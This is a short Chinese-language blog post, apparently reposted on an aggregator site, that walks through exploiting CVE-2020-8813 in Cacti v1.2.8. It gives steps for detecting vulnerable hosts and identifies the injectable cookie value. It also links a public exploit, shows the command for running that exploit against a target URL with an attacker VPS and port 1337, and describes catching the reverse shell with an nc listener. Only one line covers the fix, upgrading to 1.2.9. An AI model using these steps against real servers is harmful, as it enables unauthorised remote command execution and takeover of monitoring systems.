Cacti v1.2.8(CVE-2020-8813)漏洞利用
生活随笔
收集整理的這篇文章主要介紹了
Cacti v1.2.8(CVE-2020-8813)漏洞利用
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
0x00 簡介
Cacti是一套基于PHP,MySQL,SNMP及RRDTool開發的網絡流量監測圖形分析工具。
可以看到中國有2714個站點都使用了這個工具。覆蓋面還是比較廣。
0x01 影響范圍
受影響Cacti版本:Cacti v1.2.8
0x02 檢測
1、先判斷是否存在路徑:/graph_realtime.php?action=init ,能正常回顯說明存在。
2、再判斷回顯頁面文本中是否存在“poller_realtime.php”字樣,存在則存在漏洞。
也能訪問到poller_realtime.php
可用腳本批量檢測。
0x03 存在點
漏洞存在點為登錄處的cookie處,變量Cacti的值,可將Cacti的值更改為系統命令,直接造成命令執行。
0x04 利用
exp下載:https://github.com/mhaskar/CVE-2020-8813
可用里面的第二個腳本:
python Cacti-preauth-rce.py http://xx.xx.xx.xx/cacti vps-host 1337
然后先在vps上開啟nc監聽端口1337,即可接收到反彈shell。
0x05 防范
更新Cacti版本至最新版 v1.2.9
總結
以上是生活随笔為你收集整理的Cacti v1.2.8(CVE-2020-8813)漏洞利用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: NSURLSession的应用
- 下一篇: iOS中XML解析